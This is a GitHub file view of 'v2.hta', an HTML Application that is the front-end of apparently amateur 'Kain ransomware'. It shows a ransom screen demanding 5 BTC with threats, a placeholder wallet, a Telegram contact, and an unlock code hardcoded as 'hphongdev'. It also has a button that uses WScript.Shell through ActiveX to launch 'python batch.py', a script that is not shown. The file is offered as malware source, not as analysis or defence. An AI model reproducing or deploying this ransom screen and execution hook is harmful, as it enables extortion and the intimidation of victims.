-
Notifications
You must be signed in to change notification settings - Fork 1
/
v2.hta
90 lines (83 loc) · 2.44 KB
/
v2.hta
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
<!DOCTYPE html>
<html>
<head>
<title>Kain ransomware</title>
<HTA:APPLICATION
ID="Kain"
APPLICATIONNAME="Hphongdev - kainransomeware"
BORDER="thin"
BORDERSTYLE="normal"
ICON=""
scroll="no"
singleinstance="yes"
windowstate="normal"
caption="yes"
border="none"
innerborder="no"
contextmenu="no"
maximizebutton="no"
minimizebutton="no"
sysmenu="yes"
navigable="no"
showintaskbar="no"
/>
<style>
body {
font-family: Arial, sans-serif;
text-align: center;
padding: 20px;
background-color: black;
overflow: hidden;
}
h1 {
color: red;
}
h2 {
color: white;
}
p {
color: red;
}
button {
color: white;
background-color: red;
padding: 10px 20px;
border: none;
cursor: pointer;
}
button:hover {
background-color: darkred;
}
</style>
<script type="text/javascript">
function showBtcWallet() {
var messageLabel = document.getElementById("message-label");
messageLabel.innerText = "My BTC wallet: 9999999999999999";
}
function runPythonScript() {
var objShell = new ActiveXObject("WScript.Shell");
objShell.Run("python batch.py", 1, false);
}
function checkCode() {
var codeInput = document.getElementById("codeInput").value;
if (codeInput === "hphongdev") {
window.close();
}
}
</script>
</head>
<body>
<h1>Kain ransomware</h1>
<h2>Do not try to exit, you cannot haha! Send me 5 BTC to unlock your device within a week, or else your PC will be dead.</h2>
<p id="message-label">You have been hacked! All your files have been decrypted.</p>
<button onclick="showBtcWallet()">My BTC Wallet</button>
<button onclick="runPythonScript()">Check your info</button>
<div>
<h2>Contact Telegram: @vilgaxinjector</h2>
<h2>Insert the code after sending 5 BTC to me here:</h2>
<input type="text" id="codeInput">
<div>
<button onclick="checkCode()">SUBMIT</button>
</div>
</body>
</html>